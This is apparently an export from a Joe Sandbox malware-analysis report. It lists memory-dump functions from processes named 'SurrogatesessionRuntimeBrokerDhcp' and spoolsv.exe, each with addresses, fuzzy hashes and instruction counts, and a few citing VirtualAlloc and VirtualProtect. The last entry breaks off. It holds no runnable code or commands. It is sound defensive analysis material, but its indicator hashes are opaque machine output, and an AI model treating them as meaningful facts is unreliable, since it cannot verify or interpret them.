Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe908cef7064a10310ea2a511649c2a64c5a1d57323a157072cc9059c7e6252
Instruction ID: 523be3802f4d641954b3773399bd1d96b33bed122fd9134a1d2fd7814985cc85
Opcode Fuzzy Hash: 1fe908cef7064a10310ea2a511649c2a64c5a1d57323a157072cc9059c7e6252
Instruction Fuzzy Hash: 0101B131A0E28C8FE722DBA888641DCBFB0EF42310F1541E7D450DB2A6EA745644CB80

Function 00007FFD9BAB4381 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcf283dd5296d7c01a684a13c64ed135a7536069beab839b247caaa0c5222b5e
Instruction ID: 225f17fd221b6cc1dca0ffeeea4096fce045e29be48cb66b738155ff8a6a357f
Opcode Fuzzy Hash: dcf283dd5296d7c01a684a13c64ed135a7536069beab839b247caaa0c5222b5e
Instruction Fuzzy Hash: C1F0E135618A188FCB55DF04C8A5EE973E1FBA8301F14429DD40AD7261DA34AA44CF85

Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181cabb64a454963af76e9c1f36a10c50838df9a9a99d7baeaec70c38a48b096
Instruction ID: 494945364053d7d259f8df3da133625ded0feb3fe55619237865d581978fec6e
Opcode Fuzzy Hash: 181cabb64a454963af76e9c1f36a10c50838df9a9a99d7baeaec70c38a48b096
Instruction Fuzzy Hash: ADF0553161D649CFC782AB38DCA94D47F60EB43204B9A14FAC08AC7562C220181ECB00

Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6750df165741a74768d521380eaea6cbae65be6fe707c9c2c7e6ee90a038b1be
Instruction ID: 2d6000382600416b1366cf83e7930b232f82b0bbfe6cc949bb60c270aa912798
Opcode Fuzzy Hash: 6750df165741a74768d521380eaea6cbae65be6fe707c9c2c7e6ee90a038b1be
Instruction Fuzzy Hash: B901A230E0E28D8FE721DBA488641DCBFB0EF46314F1541E7D454DB2A6EA785644CB45

Function 00007FFD9BAB27CA Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5017599dd53eaf80eddef856f74fa36456e6f3c4bfbf8d083df46c44363497
Instruction ID: 9c5c9defee324db0984cdccb0c9090e80bc0a81ed04b8c5d03da18d9a8699480
Opcode Fuzzy Hash: 5d5017599dd53eaf80eddef856f74fa36456e6f3c4bfbf8d083df46c44363497
Instruction Fuzzy Hash: C6F09631E0D52D4AEA74E794D4647F82391FB54310F1241B6D85DD31F2CD686E828D44

Function 00007FFD9BAB10C0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c53ad06450d0995101378d30a491f3986786833947bdb577d401fced5d19666
Instruction ID: 5c25309cba89d87fc627132d9c9fd4657418078e5adf0f52a1d3d71ae1c5b04c
Opcode Fuzzy Hash: 6c53ad06450d0995101378d30a491f3986786833947bdb577d401fced5d19666
Instruction Fuzzy Hash: 5CE02621F5C8590AFB7CAA742CB25F07380DB85324B0506BDD42EC22DACC491C814281

Function 00007FFD9BAB71DB Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbadaa653fb581fcf318b1f0c18daaba9e4a8eb4c96fffdd4b616e7a6064baa6
Instruction ID: 080744804e33890572bd2d68df1a62d7fc527d8a57cb8098b4208136210ed08b
Opcode Fuzzy Hash: fbadaa653fb581fcf318b1f0c18daaba9e4a8eb4c96fffdd4b616e7a6064baa6
Instruction Fuzzy Hash: 1CF0A020F0A16A4FF370979488713BAA392EF85300F0111B9D86E932E3CEB86D418E45

Function 00007FFD9BAB267D Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c5a54a54d9a661f630f0a11633124cd3787fcafb3e4d901948bceee690a546
Instruction ID: 3ca630d88df3da342e8d5dff799deaa0316333ebf65b796195e42598f60551d1
Opcode Fuzzy Hash: e4c5a54a54d9a661f630f0a11633124cd3787fcafb3e4d901948bceee690a546
Instruction Fuzzy Hash: 43E0EC11B1D56A0AF3BCA2A918363B89482AF98714F4A41BDA46EC62D3DD5829404656

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cad09872e0d0da1e2d5384aa9319a54457501d03356f0f19a341ea23ddec882
Instruction ID: e6ab6a7e50c71e01385bb1143932a9946273b4479bffc19c0b0e2d0c37345f80
Opcode Fuzzy Hash: 7cad09872e0d0da1e2d5384aa9319a54457501d03356f0f19a341ea23ddec882
Instruction Fuzzy Hash: 11C00205F5B52E01E43577AB58660ACA140ABD5A10FDB0176D529900A1A8DD2296095A

Function 00007FFD9BAB0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff582189b9a35f43c39972fd7c97811ae0d3588d9f2198bd9f8e60a8c93180a
Instruction ID: aee8961ca25eec59ae4dce0fef23432369508d6c248725092f38ae7b06ae2a74
Opcode Fuzzy Hash: 1ff582189b9a35f43c39972fd7c97811ae0d3588d9f2198bd9f8e60a8c93180a
Instruction Fuzzy Hash: 30C08C305118088FC900EB2CC88580032A0FB0E210BC200A4E00EC7170E26A9C80CB00

Function 00007FFD9BAB12B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b037bd4be616fec55f961f8c3a4a87213a84a826305a4a611f95b133d562533
Instruction ID: 585c7074d51c2b05c77c5136d08f563344fd8a12fec83fdac4b7b8113291121f
Opcode Fuzzy Hash: 0b037bd4be616fec55f961f8c3a4a87213a84a826305a4a611f95b133d562533
Instruction Fuzzy Hash: 1FC08C3055180C8FC908EB68C89480433A0FB09300FC20090E008C7170D659DCC1CB40

Function 00007FFD9BAB2659 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00f8a479f608d4f4595075f34be7a14175516e945cac12893e0d3ed061b8d83f
Instruction ID: ff0de88d0acd72c6f67fdc669344ecb171ba9590556713216b0e1e8688e51b31
Opcode Fuzzy Hash: 00f8a479f608d4f4595075f34be7a14175516e945cac12893e0d3ed061b8d83f
Instruction Fuzzy Hash: 2DC04C12F1892E06F26D661848725BE44439F5471CF9502BCE42DCA2DECD5E5A120696

Function 00007FFD9BAB0540 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed281084219896fffb8f7fabef37e975e81606d47f1f073dbd3a156041642d1a
Instruction ID: 91913f21040fbe0cfa742cc2833d42526ee1ab89f843863f9c68b2d02fe02714
Opcode Fuzzy Hash: ed281084219896fffb8f7fabef37e975e81606d47f1f073dbd3a156041642d1a
Instruction Fuzzy Hash: 01B01230D7F61F46D93C37B10852074B0D0EF06208FD205B8D419401B2E8EF56D58A42

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
Instruction ID: f48f4236fb314fac08a6050c2bd5cff1af2684509b117e39d5e87cc7a46f5244
Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
Instruction Fuzzy Hash: 87B01200D5741F00E43433FB0C52068B040AB44200FCA0170D41E90091A8CD12950657

Analysis Process: spoolsv.exePID: 6760, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BA90D4C Relevance: 1.5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5\_H, xrefs: 00007FFD9BA90DF3

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID: 5\_H
API String ID: 0-3325266018
Opcode ID: 299c1a0beab3a4b85d58e4c46bea3bddce276cd2f84c896368568dbe8f20ac63
Instruction ID: decb942b114562e3f3ef40ae2359633ad12693a4378182cd1424f85ed511b5e3
Opcode Fuzzy Hash: 299c1a0beab3a4b85d58e4c46bea3bddce276cd2f84c896368568dbe8f20ac63
Instruction Fuzzy Hash: 5391E175A19A8D8FE799DB6888797A87FF0FF96354F4001AAE00DD72E6CBB81410C704

Function 00007FFD9BAA0BC6 Relevance: .9, Instructions: 857COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9baa0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908c8dd809e95c409e8b98b611c46928aaa9142ab0273215c6536190445b1707
Instruction ID: b83c9a43b8fc7bf6256d8197b122a8aa79df8dec2deeb0aea14a0bbbe03d3937
Opcode Fuzzy Hash: 908c8dd809e95c409e8b98b611c46928aaa9142ab0273215c6536190445b1707
Instruction Fuzzy Hash: 8052E731B1990E4FEBA8EB5884A17B87392FFA8350F1541B9D04EC72E7DE786D858740

Function 00007FFD9BAA10CD Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9baa0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcfb163b02d1d613dd7df1e1f3eee07ae8aaed00f286cdf2809b30ac867a2895
Instruction ID: 16932b84f3504517f0444e1f1dc7bb54ebfa635a0a7b4a7b8528ecbc57835274
Opcode Fuzzy Hash: dcfb163b02d1d613dd7df1e1f3eee07ae8aaed00f286cdf2809b30ac867a2895
Instruction Fuzzy Hash: 6D120321B1990E5BEBA8EB6884A17B93393FFA9340F114179D44DC72E7DE78AD42C740

Function 00007FFD9BAC187A Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e60e515b4b137be2c193b8bf3c9e39f57f2711b0c266739b52f8b8fdc0a78fb
Instruction ID: a49f7ecde1eff4f41a93e4df6bf252ec1da94014fff671c30d27dcef37a1e3e8
Opcode Fuzzy Hash: 3e60e515b4b137be2c193b8bf3c9e39f57f2711b0c266739b52f8b8fdc0a78fb
Instruction Fuzzy Hash: 54B1BA31F2D65E0AE32D6A5848521B573D1EFA2305B26877DD8DBC309BE928F50346C1

Function 00007FFD9BA90E43 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ce1fb9bda92ca6a213da2ddc9e2030ae2662672d40210988f96c899f4c169d
Instruction ID: 51fe873b1fbcdf326a8a929ce06ba878802aa71c041365e7376418dca421dc67
Opcode Fuzzy Hash: 45ce1fb9bda92ca6a213da2ddc9e2030ae2662672d40210988f96c899f4c169d
Instruction Fuzzy Hash: CF510F76A1894D8FE7A9DB5C8869BA87BE4EF89328F40017EE00DD73D6CBB81411C704

Function 00007FFD9BA9B32A Relevance: 1.6, APIs: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9BA9B40D

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA97000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba97000_spoolsv.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: edb359786ea9e808f8261bf8134f93e0a2888e1e13d301fa4aa5a0b7162c5079
Instruction ID: 254f4b612b5ff62c31cb3d88ca0d09089da905108028872c4079824a28ee2b0d
Opcode Fuzzy Hash: edb359786ea9e808f8261bf8134f93e0a2888e1e13d301fa4aa5a0b7162c5079
Instruction Fuzzy Hash: 9041193190D7884FDB19DBA89C166E97FE0EF56321F0443AFD089D32A2CE746806C792

Function 00007FFD9BA9C211 Relevance: 1.5, APIs: 1, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA97000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba97000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95152734227c62364846fea6d59915e9c63a4b1d2597abaa44269b185f2d111
Instruction ID: 3d20b12844808e4033053a5851331a951982f9bcc99ade7dfc74bf0d6572d866
Opcode Fuzzy Hash: c95152734227c62364846fea6d59915e9c63a4b1d2597abaa44269b185f2d111
Instruction Fuzzy Hash: 91512C31B1DA4C0FE758F76C98566B977E1EB99325F00417EE04DC32E3DE68A8428785

Function 00007FFD9BA9C301 Relevance: 1.4, APIs: 1, Instructions: 126
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD9BA9C3B4

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA97000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba97000_spoolsv.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d806db3b30493475976c252a37a46ea8fea300506f213cacbc5e741a2080f503
Instruction ID: 8ba27baedf036518f6044013805f2555c27c66482182f685ff15238756cc2046
Opcode Fuzzy Hash: d806db3b30493475976c252a37a46ea8fea300506f213cacbc5e741a2080f503
Instruction Fuzzy Hash: 9B312C31A0CB4C4FDB1DAB6898166FABBF0EF56321F04426FE04AC3153DA646916C7C1

Function 00007FFD9BAB5965 Relevance: 1.3, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BAB5946

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: c9a5fc68cd03dea524928f5fea1e07a87a856e2f38b7ee4acc2abf9d4b8fa9bd
Instruction ID: 5b8af04596b7f1ecb000ee16a21d799b274c7419b6f888514babb0f208f40ae6
Opcode Fuzzy Hash: c9a5fc68cd03dea524928f5fea1e07a87a856e2f38b7ee4acc2abf9d4b8fa9bd
Instruction Fuzzy Hash: B211062070EAD90FCB65973888745687BA1EFA6210B0941FBC049CB1A3DD5C9C86C781

Function 00007FFD9BAB5929 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BAB5946

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 16078664bc74271d7110195665e759b0b7a1fe91ce874ea4e0a52dcbff20640a
Instruction ID: e1d2f6b697c6c5448571ba55e27b262b3ad3e9a57f187d3e6827a7bf49ed0637
Opcode Fuzzy Hash: 16078664bc74271d7110195665e759b0b7a1fe91ce874ea4e0a52dcbff20640a
Instruction Fuzzy Hash: BEE0656154F7C44FC716973488694547FA0FF6721174A41EEC046CF1A3DA1D8845CB01

Function 00007FFD9BACB2F9 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BACB316

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: fcabae2a84286ce980d9923a79be21640aec8613d871d968bb9ddc21b6a6ffef
Instruction ID: 9e5afd3a0b78fb8784845d3ef893ccb9c69357011074361cbf7c6833ddcb4603
Opcode Fuzzy Hash: fcabae2a84286ce980d9923a79be21640aec8613d871d968bb9ddc21b6a6ffef
Instruction Fuzzy Hash: 5DE06D6160E3C44FC71AAA3488688557F60EE6721134A42EFC045CF2A7EA2DC889C701

Function 00007FFD9BACB229 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BACB246

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7b65c577646bf47c035a5b8083f4943c3163d9faa30ffdcf233f9fcc46c1d716
Instruction ID: 8ed945c08b8e5d5bbd194d0156e6323ac2d6aefbab0ed5330f47bb36097a02bd
Opcode Fuzzy Hash: 7b65c577646bf47c035a5b8083f4943c3163d9faa30ffdcf233f9fcc46c1d716
Instruction Fuzzy Hash: 0FE0927160E3C44FC71AEB7488688557F60EF6720134A42EFC045CF2A7EA2DC889C701

Function 00007FFD9BAC2839 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BAC2856

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 20d9c6b1b865d63daf1afbd54af933e14301e7da752dca32dca0fa4fc9283ce1
Instruction ID: 07641f7da7be6a57b398c7c03a7fdd1293409a44537b7ebc39b0cc25d4c01bde
Opcode Fuzzy Hash: 20d9c6b1b865d63daf1afbd54af933e14301e7da752dca32dca0fa4fc9283ce1
Instruction Fuzzy Hash: 20E0127164F3C44FCB16EA748868455BF60EF6721174A51EFC046CF2A7EA2DC885C711

Function 00007FFD9BACB7F9 Relevance: 1.3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BACB816

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: a6ee86a930dd0f5800286183d5933827c2919fa286255c2c5aaae29b1502fd66
Instruction ID: 6f564c219432399e5338aa5ff561029acedd31d9675486b320e361135c0822c7
Opcode Fuzzy Hash: a6ee86a930dd0f5800286183d5933827c2919fa286255c2c5aaae29b1502fd66
Instruction Fuzzy Hash: 3BE01A6154E3C44FCB06AB7488658553FA09E6B21178B40EEC145CF5B7E62DC849C711

Function 00007FFD9BAB96F9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAB9716

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 702664076cec40addba4e4298a722de235ef504a8b8ae5a80d46296d33029cfb
Instruction ID: 2b789875915d7b8ea1cb49a2c9600ad754c4b99c3b3716af8d28bd0d3a01ab0a
Opcode Fuzzy Hash: 702664076cec40addba4e4298a722de235ef504a8b8ae5a80d46296d33029cfb
Instruction Fuzzy Hash: F7E01A6154E3C44FCB1AEB7488698543F609E6B21078B40EEC145CF1B3E62DC949C701

Function 00007FFD9BAB98A9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAB98C6

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 68804130bd1d3ac66979ea8a97a48d4a1c361a87dc5188c5a733bd0446cab09f
Instruction ID: ee7ce5cb2d6ba97930a1c43a41e0f5c7437c10c245ff7f33ee55e39b7ae23021
Opcode Fuzzy Hash: 68804130bd1d3ac66979ea8a97a48d4a1c361a87dc5188c5a733bd0446cab09f
Instruction Fuzzy Hash: 30E0E56194E7D44FCB16EB7488AA9547FA0AE6721078A41EEC085CB1B3E62A8949CB01

Function 00007FFD9BAC28C9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAC28E6

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 687ecd5d94241f0f0dea73293067304496e69224c2b99d004637811a7dd9a88e
Instruction ID: 9a9bcda188e907cb0e60dab744c3ab201920cd99ed281743487b58e6ea1a2c9a
Opcode Fuzzy Hash: 687ecd5d94241f0f0dea73293067304496e69224c2b99d004637811a7dd9a88e
Instruction Fuzzy Hash: 67E01A7154E3C04FCB16EB7488698543FB0AE6B21078B41DEC049CF1B3D62DD949C701

Function 00007FFD9BAC8F89 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAC8FA6

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 1688c580e339ef10dc4fbab79f28e0852346629f6bca0d83bdf6ad7b0f99d590
Instruction ID: 4eabd51631d7f92f997d40da8d8d969772d99ed54153f8902faa1d1809d7fc4f
Opcode Fuzzy Hash: 1688c580e339ef10dc4fbab79f28e0852346629f6bca0d83bdf6ad7b0f99d590
Instruction Fuzzy Hash: E4E0E56194E7C44FCB16AB74886A9557FB0EE6721078A40EEC286CF1B3E6298849C701

Function 00007FFD9BAA1827 Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9baa0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf116f98950900922de843b05d911f95f1b996fd49df84ccdcae9657a66f0d9b
Instruction ID: d7f25d5c4c7f8bc9bb3962bbf90269e0b0d4e10a52d93f8eb7fbf5db0d54bf7c
